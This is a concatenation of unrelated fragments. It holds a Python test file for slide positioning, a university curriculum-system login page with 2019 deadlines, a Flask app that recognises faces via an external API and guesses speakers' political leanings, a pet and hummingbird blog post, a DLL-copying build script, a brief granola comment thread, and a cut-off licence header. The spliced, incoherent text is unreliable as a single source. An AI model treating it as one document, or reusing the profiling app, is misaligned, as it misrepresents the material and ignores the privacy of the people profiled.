"data-scale": "r0",
"is_path": True,
"path": "m 100 100 l 200 0 l 0 200",
},
{
"data-x": "r1600",
"data-y": "r0",
"data-z": "r0",
"data-rotate-x": "r0",
"data-rotate-y": "r0",
"data-rotate-z": "r0",
"data-scale": "r0",
"is_path": True,
},
{
"data-x": "r1600",
"data-y": "r0",
"data-z": "r0",
"data-rotate-x": "r0",
"data-rotate-y": "r0",
"data-rotate-z": "r0",
"data-scale": "r0",
"is_path": True,
},
{
"data-x": "0",
"data-y": "0",
"data-z": "r0",
"data-rotate-x": "r0",
"data-rotate-y": "r0",
"data-rotate-z": "r0",
"data-scale": "r0",
"is_path": False,
},
{
"data-x": "r0",
"data-y": "r0",
"data-z": "r0",
"data-rotate-x": "r0",
"data-rotate-y": "r0",
"data-rotate-z": "90",
"data-scale": "r0",
"is_path": False,
},
{
"data-x": "r0",
"data-y": "r0",
"data-z": "r0",
"data-rotate-x": "r0",
"data-rotate-y": "r0",
"data-rotate-z": "r0",
"data-scale": "r0",
"is_path": False,
},
{
"data-x": "r0",
"data-y": "r0",
"data-z": "r0",
"data-rotate-x": "r0",
"data-rotate-y": "r0",
"data-rotate-z": "r0",
"data-scale": "r0",
"is_path": True,
"path": "m 100 100 l 200 0 l 0 200",
},
{
"data-x": "r0",
"data-y": "r0",
"data-z": "r0",
"data-rotate-x": "r0",
"data-rotate-y": "r0",
"data-rotate-z": "r0",
"data-scale": "r0",
"is_path": True,
},
{
"data-x": "r0",
"data-y": "r0",
"data-z": "1000",
"data-rotate-x": "180",
"data-rotate-y": "r0",
"data-rotate-z": "r0",
"data-scale": "r0",
"is_path": True,
},
{
"data-x": "3000",
"data-y": "1000",
"data-z": "r0",
"data-rotate-x": "r0",
"data-rotate-y": "r0",
"data-rotate-z": "r0",
"data-scale": "r0",
"is_path": False,
},
{
"data-x": "firstID+1000",
"data-y": "firstID-500",
"data-z": "r0",
"data-rotate-x": "r0",
"data-rotate-y": "r0",
"data-rotate-z": "r0",
"data-scale": "r0",
"is_path": False,
},
{
"data-x": "secondID+800",
"data-y": "200",
"data-z": "r0",
"data-rotate-x": "r0",
"data-rotate-y": "r0",
"data-rotate-z": "r0",
"data-scale": "r0",
"is_path": False,
},
],
)
class CalculateTests(unittest.TestCase):
"""Tests that positions are correctly calculated"""
def test_square(self):
# Slides, positioned in a square
positions = [
{"data-x": "0", "data-y": "0"},
{"data-x": "r1200", "data-y": "0"},
{"data-x": "r1200", "data-y": "0"},
{"data-x": "r1200", "data-y": "0"},
{"data-x": "r0", "data-y": "r-1000"},
{"data-x": "r0", "data-y": "r-1000"},
{"data-x": "r0", "data-y": "r-1000"},
{"data-x": "r-1200", "data-y": "r0"},
{"data-x": "r-1200", "data-y": "r0"},
{"data-x": "r-1200", "data-y": "r0"},
{"data-x": "r0", "data-y": "r1000"},
{"data-x": "r0", "data-y": "r1000"},
]
positions = list(calculate_positions(positions))
self.assertEqual(
positions,
[
{
"data-x": 0,
"data-y": 0,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
{
"data-x": 1200,
"data-y": 0,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
{
"data-x": 2400,
"data-y": 0,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
{
"data-x": 3600,
"data-y": 0,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
{
"data-x": 3600,
"data-y": -1000,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
{
"data-x": 3600,
"data-y": -2000,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
{
"data-x": 3600,
"data-y": -3000,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
{
"data-x": 2400,
"data-y": -3000,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
{
"data-x": 1200,
"data-y": -3000,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
{
"data-x": 0,
"data-y": -3000,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
{
"data-x": 0,
"data-y": -2000,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
{
"data-x": 0,
"data-y": -1000,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
],
)
def test_relative_positioning(self):
# Relative positioning is probably the most useful positioning.
# It allows you to insert or remove a slide, and everything adjusts.
positions = [
# The first two slides are just default positons
{"data-x": "r0", "data-y": "r0"},
{"data-x": "r1600", "data-y": "r0"},
# Then suddenly we move vertically!
{"data-x": "r0", "data-y": "r1000"},
# Continue the same way one slide.
{"data-x": "r0", "data-y": "r1000"},
# Stand still
{"data-x": "r0", "data-y": "r0"},
# Stand still again!
{"data-x": "r0", "data-y": "r0"},
# Move a little bit
{"data-x": "r-40", "data-y": "r-200"},
# Go back to normal movement to the right
{"data-x": "r1600", "data-y": "r0"},
{"data-x": "r1600", "data-y": "r0"},
{"data-x": "r1600", "data-y": "r0"},
# Absolute movement back to start!
{"data-x": "0", "data-y": "0"},
# Absolute movement to a center for end (with zoomout for example)
{"data-x": "3000", "data-y": "1000"},
]
positions = list(calculate_positions(positions))
self.assertEqual(
positions,
[
{
"data-x": 0,
"data-y": 0,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
{
"data-x": 1600,
"data-y": 0,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
{
"data-x": 1600,
"data-y": 1000,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
{
"data-x": 1600,
"data-y": 2000,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
{
"data-x": 1600,
"data-y": 2000,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
{
"data-x": 1600,
"data-y": 2000,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
{
"data-x": 1560,
"data-y": 1800,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
{
"data-x": 3160,
"data-y": 1800,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
{
"data-x": 4760,
"data-y": 1800,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
{
"data-x": 6360,
"data-y": 1800,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
{
"data-x": 0,
"data-y": 0,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
{
"data-x": 3000,
"data-y": 1000,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
],
)
def test_absolute_path(self):
# Position slides along a path
positions = [
{
"data-x": "r0",
"data-y": "r0",
"path": "M 100 100 L 300 100 L 300 300",
"is_path": True,
},
{"is_path": True},
{"is_path": True},
{"is_path": True},
{"is_path": True},
]
positions = list(calculate_positions(positions))
self.assertEqual(
positions,
[
{
"data-x": 0,
"data-y": 0,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
{
"data-x": 2000,
"data-y": 0,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
{
"data-x": 4000,
"data-y": 0,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 44.99999999999999,
"data-scale": 1,
},
{
"data-x": 4000,
"data-y": 2000,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 90.0,
"data-scale": 1,
},
{
"data-x": 4000,
"data-y": 4000,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 90.0,
"data-scale": 1,
},
],
)
def test_relative_path(self):
positions = [
{"data-x": "r0", "data-y": "r0"},
{"data-x": "r1600", "data-y": "r0"},
{
"data-x": "r1600",
"data-y": "r0",
"is_path": True,
"path": "m 100 100 l 200 0 l 0 200",
},
{"data-x": "r0", "data-y": "r0", "is_path": True},
{"data-x": "r0", "data-y": "r0", "is_path": True},
{"data-x": "r1600", "data-y": "r0"},
{"data-x": "r0", "data-y": "r2400"},
]
positions = list(calculate_positions(positions))
self.assertEqual(
positions,
[
{
"data-x": 0,
"data-y": 0,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
{
"data-x": 1600,
"data-y": 0,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
{
"data-x": 3200,
"data-y": 0,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
# This point is exactly on a 90 degree angle. Therefore,
# it's angle is calculated as 45 degrees, it being the
# average.
{
"data-x": 5600,
"data-y": 0,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 44.99999999999999,
"data-scale": 1,
},
{
"data-x": 5600,
"data-y": 2400,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 90.0,
"data-scale": 1,
},
{
"data-x": 7200,
"data-y": 2400,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 90.0,
"data-scale": 1,
},
{
"data-x": 7200,
"data-y": 4800,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 90.0,
"data-scale": 1,
},
],
)
def test_complex_path(self):
positions = [
{"data-x": "r0", "data-y": "r0"},
{"data-x": "r1600", "data-y": "r0"},
{
"data-x": "r1600",
"data-y": "r0",
"path": "m 100 100 l 200 0 l 0 200",
"is_path": True,
},
{"is_path": True},
{"is_path": True},
# Note that we don't change the rotation, so it stays at 90, here.
{"data-x": "0", "data-y": "0"},
# No new x and y, previous was absolute: Stay still!
{},
{
"data-x": "r0",
"data-y": "r0",
"path": "m 100 100 l 200 0 l 0 200",
"is_path": True,
},
{"is_path": True},
{"is_path": True},
{"data-x": "3000", "data-y": "1000", "data-rotate-z": "0"},
]
positions = list(calculate_positions(positions))
self.assertEqual(
positions,
[
{
"data-x": 0,
"data-y": 0,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
{
"data-x": 1600,
"data-y": 0,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
{
"data-x": 3200,
"data-y": 0,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
{
"data-x": 5600,
"data-y": 0,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 44.99999999999999,
"data-scale": 1,
},
{
"data-x": 5600,
"data-y": 2400,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 90.0,
"data-scale": 1,
},
# Note that we don't change the rotation, so it stays at 90, here.
{
"data-x": 0,
"data-y": 0,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 90.0,
"data-scale": 1,
},
# No settings, still same place and rotation.
{
"data-x": 0,
"data-y": 0,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 90.0,
"data-scale": 1,
},
# We start a path, but x and y are r0, so no movement.
# However, the rotation will come from the path, so it resets to 0.
{
"data-x": 0,
"data-y": 0,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
{
"data-x": 2400,
"data-y": 0,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 44.99999999999999,
"data-scale": 1,
},
{
"data-x": 2400,
"data-y": 2400,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 90.0,
"data-scale": 1,
},
{
"data-x": 3000,
"data-y": 1000,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
],
)
class PositionTest(unittest.TestCase):
def test_complete(self):
tree = make_tree("positioning.rst")
# Position the slides:
position_slides(tree)
# Get all slide position data:
positions = []
for step in tree.findall("step"):
pos = {}
for key in step.attrib:
if key.startswith("data-"):
pos[key] = step.attrib[key]
positions.append(pos)
self.assertEqual(
positions,
[
{
"data-x": "0",
"data-y": "0",
"data-z": "0",
"data-rotate-x": "0",
"data-rotate-y": "0",
"data-rotate-z": "0",
"data-scale": "1",
},
{
"data-x": "1600",
"data-y": "0",
"data-z": "0",
"data-rotate-x": "0",
"data-rotate-y": "0",
"data-rotate-z": "0",
"data-scale": "1",
},
# Because of the path, we now get an explicit rotation:
{
"data-x": "3200",
"data-y": "0",
"data-z": "0",
"data-rotate-x": "0",
"data-rotate-y": "0",
"data-rotate-z": "0",
"data-scale": "1",
},
{
"data-x": "5600",
"data-y": "0",
"data-z": "0",
"data-rotate-x": "0",
"data-rotate-y": "0",
"data-rotate-z": "44.99999999999999",
"data-scale": "1",
},
{
"data-x": "5600",
"data-y": "2400",
"data-z": "0",
"data-rotate-x": "0",
"data-rotate-y": "0",
"data-rotate-z": "90.0",
"data-scale": "1",
},
# Rotation carries over from last part of path.
{
"data-x": "0",
"data-y": "0",
"data-z": "0",
"data-rotate-x": "0",
"data-rotate-y": "0",
"data-rotate-z": "90.0",
"data-scale": "1",
},
# No position change
{
"data-x": "0",
"data-y": "0",
"data-z": "0",
"data-rotate-x": "0",
"data-rotate-y": "0",
"data-rotate-z": "90",
"data-scale": "1",
},
# No change at all.
{
"data-x": "0",
"data-y": "0",
"data-z": "0",
"data-rotate-x": "0",
"data-rotate-y": "0",
"data-rotate-z": "90",
"data-scale": "1",
},
# Path starts, rotation comes from path:
{
"data-x": "0",
"data-y": "0",
"data-z": "0",
"data-rotate-x": "0",
"data-rotate-y": "0",
"data-rotate-z": "0",
"data-scale": "1",
},
{
"data-x": "2400",
"data-y": "0",
"data-z": "0",
"data-rotate-x": "0",
"data-rotate-y": "0",
"data-rotate-z": "44.99999999999999",
"data-scale": "1",
},
# Explicit rotate-x and z, automatic position including rotate-z from path.
{
"data-x": "2400",
"data-y": "2400",
"data-z": "1000",
"data-rotate-x": "180",
"data-rotate-y": "0",
"data-rotate-z": "90.0",
"data-scale": "1",
},
# Explicit x and y, all other carry over from last slide.
{
"data-x": "3000",
"data-y": "1000",
"data-z": "1000",
"data-rotate-x": "180",
"data-rotate-y": "0",
"data-rotate-z": "90.0",
"data-scale": "1",
},
# Positioning relative to other slide by id
{
"data-x": "4000",
"data-y": "500",
"data-z": "1000",
"data-rotate-x": "180",
"data-rotate-y": "0",
"data-rotate-z": "90.0",
"data-scale": "1",
},
# Positioning x relative to other slide by id, Explicit y
{
"data-x": "4800",
"data-y": "200",
"data-z": "1000",
"data-rotate-x": "180",
"data-rotate-y": "0",
"data-rotate-z": "90.0",
"data-scale": "1",
},
],
)
if __name__ == "__main__":
unittest.main()
|
Firefox is the preferred browser for use with this system.
Only ECU faculty will be able to login to Curriculog.
Login requires an active Pirate ID and passphrase.
Please click the Login link to the top-right of this window to begin the login process. Enter your ECU credentials and click 'Sign in'.
Deadlines for curriculum changes to be included in the 2019-2020 Catalog.
Packages containing LEVEL I (only) action items MUST be through the UCC by March 14, 2019.
Packages containing LEVELS II & III action items MUST be through the UCC by February 28, 2019.
Packages containing LEVELS I, II & III (mixed) action items MUST be through the UCC by February 28, 2019.
Packages containing LEVEL I (only) action items MUST be through the GCC by March 20, 2019.
Packages containing LEVELS II & III action items MUST be through the GCC by February 20, 2019.
Committee meeting agendas fill up approximately two months in advance, so please plan accordingly. COMPLETED packages are put on UCC/GCC agendas in the order received and meeting time permitting. Note example: Even if your package is completed and reaches the GCC/UCC approval step by January 25, it does not guarantee your package will make it on an agenda prior to the deadline; therefore, it is recommended to have your package completed by January 1, 2019.
Curriculum changes approved by the UCC/GCC after the above deadlines will NOT be reflected in the 2019-2020 catalogs. No exceptions.
For proposal assistance, contact your college/department undergraduate or graduate liaison.
Curriculog is ECU’s curriculum and program management system.
Programs and courses are developed or revised, and then routed for review and approval by department, college, and university committees, all using Curriculog. Curriculog helps the institution provide transparency throughout the approval process, improves communication, allows faculty planners to track the progress of the package, and sends notifications to reviewers and approvers that action is needed. In addition, Curriculog integrates with Acalog and Banner to ensure consistent information across platforms and compliance with accreditors.
If you have a question or need system assistance, please contact the Curriculog System Administrator at curriculog@ecu.edu.
|
from . import config
from flask import Flask, request, render_template
import indicoio, requests
import ujson as json
from RedisLib import rds, R_SPEGILL_USER
import base64, hashlib
indicoio.config.api_key = config.indico_api_key
app = Flask('spegill')
app.secret_key = config.password
current_talking_user = ""
def append_to_redis_array(redis_key, new_entry):
# new_entry is an array that is to be combined with
# the existing array in `redis_key`
curr_redis_data = rds.get(redis_key)
if curr_redis_data == None:
curr_redis_data = "[]"
current_data = json.loads(curr_redis_data)
current_data += new_entry
new_redis_data = json.dumps(current_data)
rds.set(redis_key, new_redis_data)
def get_external_link(file_hash):
return "{}/{}.jpg".format(config.external_host, file_hash)
def retrain_dataset():
retrain_url = "https://apius.faceplusplus.com/v2/train/identify?api_secret={}&api_key={}&group_name=main".format(
config.facepp_api_secret, config.facepp_api_key
)
return requests.get(retrain_url).text
current_user = None
@app.route("/text_data", methods=["GET", "POST"])
def analyse_text():
input_text = request.form["text"]
user_key = current_talking_user
action = request.form.get("action")
if action == "political":
indico_response = indicoio.analyze_text(input_text, apis=['political'])
political_party = indico_response["political"]
top_political_party = sorted(political_party.keys(), key=lambda x: political_party[x], reverse=True)[0]
return top_political_party
else:
indico_response = indicoio.analyze_text(input_text, apis=['keywords'])
keywords = indico_response["keywords"]
keywords_ = (sorted(keywords.keys(), key=lambda x: keywords[x], reverse=True)[:5])
return keywords_
@app.route("/image_create_person", methods=["GET", "POST"])
def create_person():
face_id_list = request.form.get("face_id_list")
obj_id_list = json.loads(face_id_list)
obj_csv_id_list = ",".join(obj_id_list)
post_url = config.facepp_compiled_person_path.format(obj_csv_id_list)
icp = requests.post(post_url)
return icp.text
@app.route("/update_user_data", methods=["GET", "POST"])
def update_user_data():
person_id = request.form.get("person_id")
user_dump = request.form.get("user_dump")
spegill_user_redis_key = R_SPEGILL_USER % person_id
rds.set(spegill_user_redis_key + ":dump", user_dump)
retrain_dataset()
return "OK"
@app.route("/image_recog_person", methods=["GET", "POST"])
def recog_person():
person_image_url = request.form.get("data_hash")
post_url = config.facepp_compiled_person_get_path.format(person_image_url)
irp = requests.post(post_url)
irpp = json.loads(irp.text)
try:
recog_first_match = irpp["face"][0]["candidate"][0]
recog_person_id = recog_first_match["person_id"]
recog_person_confidence = recog_first_match["confidence"]
if recog_person_confidence < 65:
return "NO MATCH"
spegill_user_redis_key = R_SPEGILL_USER % recog_person_id
result = rds.get(spegill_user_redis_key + ":dump")
return result
except:
return "ERR"
@app.route("/image_data", methods=["GET", "POST"])
def analyse_image():
image_b64 = request.form["b64_image"][22:]
img_data = base64.b64decode(image_b64)
h = hashlib.sha256()
h.update(image_b64)
file_hash = h.hexdigest()
filename = 'spegill/static/{}.jpg'.format(file_hash)
with open(filename, 'wb') as f:
f.write(img_data)
spegill_external_path = get_external_link(file_hash)
facepp_request_path = config.facepp_compiled_path.format(spegill_external_path)
r = requests.get(facepp_request_path)
return json.dumps({"o": r.text, "ha": spegill_external_path})
@app.route("/add")
def add_ads():
return render_template("add.html")
@app.route("/")
def root():
return render_template("video.html")
|
I’ve noticed the activity at the hummingbird feeders has recently dropped off dramatically. Rather than filling the six feeders on a daily basis, I am now filling them every two to three days. Initially I attributed the decline of the feeder activity to the hummingbirds moving on elsewhere. However, the more I began watching the feeders I noticed that a single male Anna’s Hummingbird was taking it upon himself to chase the other hummingbirds away from the feeders. He is very aggressive and has established three distinct perches created with mathematical precision forming a triangular perimeter to defend his claimed feeding grounds. I am quite impressed, but also somewhat discouraged as I watch the other hummingbirds being chases away from the feeders.
As it turns out I had photographed this hummingbird several times before. He was easy to identify since he is missing several tail feathers. After one of his first photo sessions I named him “forked-tail” (FT). It wasn’t until I started observing the feeders to learn the cause for the diminished feeder activity that I realized FT was the tyrant. Since FT was around during the heavy feeding activity, I’m still convinced that many of the hummingbirds have departed. With fewer hummingbirds to deal with it is now just easier for FT to control the feeder activity.
It has been interesting to watch the strategies of the hummingbirds attempting to use the feeders. Some come in low out of the view of FT, while others would come in pairs. As FT gives chase to one the other feeds quickly. FT feeds occasionally in between chase episodes. He seems to be doing a good job of protecting his feeding complex. FT most often gives chase to an incoming hummingbird before it reaches the feeders making it a real challenge to photograph the interactions.
There have been several other interesting FT encounters. A Lesser Goldfinch occupied one of FT’s three mathematically placed perches. FT tried without success to chase the goldfinch off the perch by repeatedly diving and hovering over the bird. FT chose one of the other two perches until the goldfinch left. I have not been immune to FT’s aggression. While standing too close to the feeders FT flew over and hovered near my knees, while moving back and forth horizontally in front of me while making repeated clicking calls. Obviously FT is unaware of who is refilling the feeder complex he has claimed as his own. Or perhaps he actually did know who filled the feeders and was just scolding me for not keeping them filled. Several of the feeders were empty at the time.
I’ve thought about spreading the feeders out making it more difficult for FT to defend them all. Noticing that FT was also chasing hummingbirds off the oriole feeder located some distance away, I realized that would probably not be a satisfactory solution.
It is obvious that such aggression and control is not an easy job at all. FT is in constant patrol mode from dusk til dawn daily.
Our cat VELCRO has befriended our next door neighbor’s cat KARTER. Our neighbor advised us earlier that KARTER had adopted them not visa-versa. They warned us that we should not let KARTER in our house or he would adopt us as well. VELCRO and KARTER have been meeting on a daily basis now through screened windows or doors. They usually meet nose to nose at the front window with KARTER on the brick ledge and VELCRO inside looking out.
Recently other neighborhood cats have been showing up to visit VELCRO but usually stay below the brick ledge of the front window. Several days ago I heard VELCRO making a tender “cooing” meow and went to see what was claiming his attention. Looking up at VELCRO from below the brick ledge was a beautiful black cat with green eyes. Hmm, I thought surely it must be a female cat based on the way VELCRO was acting. Of course, VELCRO being neutered, declawed (he was a rescue cat), and an indoor cat . . . . unfortunately for VELCRO, only in his dreams.
Last evening I noticed VELCRO and KARTER were engaging each other but KARTER was staring out away from VELCRO and VELCRO was looking intently out the side window. I approached VELCRO and began to pet him when he started hissing and growling while intently looking down out the window. Through the bushes I noticed an orange cat, then another. Out the front window two more cats arrived slowly walking across the grass heading towards KARTER and VELCRO. It was an amazing assemblage occurring all at the same time – like a scene from the movie Eclipse. All the time KARTER sat at the edge of the brick ledge overlooking the cats as they assembled on the yard below him. It was as if KARTER had called for the meeting to introduce VELCRO to the other neighborhood cats, or more likely to show off his harem and subjects to VELCRO. KARTER was also probably advising VELCRO to quit cooing with his green-eyed black cat lady friend. She was not present at this gathering.
". . Oh, those green eyes!"
I imagine keeping all the neighborhood cats in line is no easy task either. It is apparent that KARTER is the Top Cat in the neighborhood as we expected him to be the first time we met him. Now he’s proven it!
* STONEHURST is the housing development in Wildomar, CA where our home is located.
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# DLL dependency resolution and copying script.
# Copyright (C) 2010 John Stumpo
# Copyright (C) 2014 Martin Müllenhaupt
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os
import shutil
import struct
import sys
def is_pe_file(file):
if not os.path.isfile(file): # Skip directories
return False
f = open(file, 'rb')
if f.read(2) != b'MZ':
return False # DOS magic number not present
f.seek(60)
peoffset = struct.unpack('<L', f.read(4))[0]
f.seek(peoffset)
if f.read(4) != b'PE\0\0':
return False # PE magic number not present
return True
def get_imports(file):
f = open(file, 'rb')
# We already know it's a PE, so don't bother checking again.
f.seek(60)
pe_header_offset = struct.unpack('<L', f.read(4))[0]
# Get sizes of tables we need.
f.seek(pe_header_offset + 6)
number_of_sections = struct.unpack('<H', f.read(2))[0]
f.seek(pe_header_offset + 116)
number_of_data_directory_entries = struct.unpack('<L', f.read(4))[0]
data_directory_offset = f.tell() # it's right after the number of entries
# Where is the import table?
f.seek(data_directory_offset + 8)
rva_of_import_table = struct.unpack('<L', f.read(4))[0]
# Get the section ranges so we can convert RVAs to file offsets.
f.seek(data_directory_offset + 8 * number_of_data_directory_entries)
sections = []
for i in range(number_of_sections):
section_descriptor_data = f.read(40)
name, size, va, rawsize, offset = \
struct.unpack('<8sLLLL', section_descriptor_data[:24])
sections.append({'min': va, 'max': va+rawsize, 'offset': offset})
def seek_to_rva(rva):
for s in sections:
if s['min'] <= rva and rva < s['max']:
f.seek(rva - s['min'] + s['offset'])
return
raise ValueError('Could not find section for RVA.')
# Walk the import table and get RVAs to the null-terminated names of DLLs
# this file uses. The table is terminated by an all-zero entry.
seek_to_rva(rva_of_import_table)
dll_rvas = []
while True:
import_descriptor = f.read(20)
if import_descriptor == b'\0' * 20:
break
dll_rvas.append(struct.unpack('<L', import_descriptor[12:16])[0])
# Read the DLL names from the RVAs we found in the import table.
dll_names = []
for rva in dll_rvas:
seek_to_rva(rva)
name = b''
while True:
c = f.read(1)
if c == b'\0':
break
name += c
dll_names.append(name.decode("ascii"))
return dll_names
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(
description='Recursive copy of DLL dependencies')
parser.add_argument('targetdir',
type=str,
help='target directory where to place the DLLs')
parser.add_argument('-C',
'--checkdir',
type=str,
action='append',
nargs='+',
default=[],
required=True,
help='directories whose dependencies must be ' +
'fulfilled. All PE files will be checked ' +
'(mostly .exe and .dll files)',
dest='checkdirs')
parser.add_argument('-L',
'--libdir',
type=str,
action='append',
nargs='+',
default=[],
required=True,
help='include directories to search for DLL ' +
'dependencies (only .dll files will be used ' +
'from here)',
dest='libdirs')
args = parser.parse_args()
if sys.version_info < (3, 0):
from sets import Set as set
# Map from shortname ('qtcore4.dll') to full path (eg.
# '/.../mxe/i686-w64-mingw32.shared/qt/bin/QtCore4.dll')
available_dlls = dict()
# Remember already copied DLLs (eg 'qtcore4.dll', 'qtgui4.dll')
copied_dlls = set()
# Remember which DLLs must still be checked (eg 'qtnetwork4.dll',
# 'qtgui4.dll')
dlls_to_copy = set()
not_found_dlls = set()
# Create a list of all available .dll files in the libdir directories
# Flattening list: http://stackoverflow.com/questions/952914
for libdir in [item for sublist in args.libdirs for item in sublist]:
for dll_filename in os.listdir(libdir):
dll_filename_full = os.path.join(libdir, dll_filename)
if dll_filename.endswith('.dll') and is_pe_file(dll_filename_full):
available_dlls[dll_filename.lower()] = dll_filename_full
# Create a list of initial dependencies (dlls_to_copy) and already copied
# DLLs (copied_dlls) from the checkdir arguments.
# Flattening list: http://stackoverflow.com/questions/952914
for checkdir in [item for sublist in args.checkdirs for item in sublist]:
for pe_filename in os.listdir(checkdir):
pe_filename_full = os.path.join(checkdir, pe_filename)
if is_pe_file(pe_filename_full):
for dependency_dll in get_imports(pe_filename_full):
dlls_to_copy.add(dependency_dll.lower())
if pe_filename.endswith('.dll'):
copied_dlls.add(pe_filename.lower())
while len(dlls_to_copy):
# We may not change the set during iteration
for dll_to_copy in dlls_to_copy.copy():
if dll_to_copy in copied_dlls:
None
elif dll_to_copy in not_found_dlls:
None
elif dll_to_copy in available_dlls:
shutil.copyfile(available_dlls[dll_to_copy],
os.path.join(args.targetdir,
os.path.basename(available_dlls[dll_to_copy])))
copied_dlls.add(dll_to_copy.lower())
for dependency_dll in get_imports(available_dlls[dll_to_copy]):
dlls_to_copy.add(dependency_dll.lower())
else:
not_found_dlls.add(dll_to_copy)
dlls_to_copy.remove(dll_to_copy)
print("Missing dll files: " + ", ".join(not_found_dlls))
|
Well, I made granola today, which was great, but the smell of it cooking gave me a kind-of migraine. Yuck!
Anyway, fun-filled update on granola tomorrow.
Oh no! I hope it goes away soon! I always feel gross when I’m around coffee roasting.
weird … well, cutting onions gives me a headache. that’s weird, too. btw … can you post an easy winter squash recipe on my blog if you get the chance?
|
# -*- coding: utf-8 -*-
# Copyright(C) 2010-2011 Vincent Paredes
#
# This file is part of a weboob module.
#
# This weboob module is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This weboob module is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
